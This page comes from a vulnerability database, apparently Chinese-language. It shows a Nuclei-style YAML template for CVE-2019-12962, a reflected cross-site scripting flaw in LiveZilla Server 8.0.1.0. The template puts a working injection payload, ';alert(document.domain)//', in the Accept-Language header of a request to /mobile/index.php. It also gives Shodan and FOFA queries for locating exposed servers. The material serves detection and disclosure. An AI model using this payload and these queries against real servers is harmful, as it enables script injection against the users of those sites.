CVE-2019-12962: LiveZilla Server 8.0.1.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: LiveZilla Server | POC: 已公开

漏洞描述

LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.

PoC代码[已公开]

id: CVE-2019-12962

info:
  name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
  author: Clment Cruchet
  severity: medium
  description: |
    LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
  remediation: |
    Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49669
    - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
    - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12962
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12962
    cwe-id: CWE-79
    epss-score: 0.06302
    epss-percentile: 0.9059
    cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: livezilla
    product: livezilla
    shodan-query:
      - http.html:LiveZilla
      - http.html:livezilla
    fofa-query: body=livezilla
  tags: cve,cve2019,xss,edb,packetstorm,livezilla

http:
  - method: GET
    path:
      - '{{BaseURL}}/mobile/index.php'

    headers:
      Accept-Language: ';alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var detectedLanguage = ';alert(document.domain)//';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220751cc654f09f1a7e15f19de06a28373ff4171eafdcd468698f2367e2c149678b022100b7edcfa8dcae264c0e0788e0d3f26f7b820b4aa75f7f7768deae30fd60131cbc:922c64590222798bb761d5b6d8e72950

相关漏洞推荐